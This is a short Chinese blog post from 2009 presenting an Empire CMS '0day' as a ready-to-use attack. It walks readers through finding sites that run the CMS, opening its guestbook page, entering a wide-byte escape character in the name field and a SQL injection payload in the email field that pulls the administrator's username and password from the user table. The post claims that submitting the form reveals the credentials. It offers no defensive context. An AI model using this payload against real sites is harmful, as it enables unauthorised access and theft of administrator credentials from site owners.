June
26th
2009
帝国CMS网站程序0DAY
评分: 
Loading ...
找到使用帝国CMS的站,网址后面直接加:
- e/tool/gbook/?bid=1
出来的是帝国CMS的留言本,在姓名处写:
- 縗\
联系邮箱处写:
- ,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
提交后爆出账号密码
via:amxking
Like
相关文章阅读
喜欢这篇文章?
订阅我的RSS,就可以自动获取最新内容了!
Tags:0day, Security.
评论数量: 没有评论
引用: http://www.i4wei.com/2009/06/849/
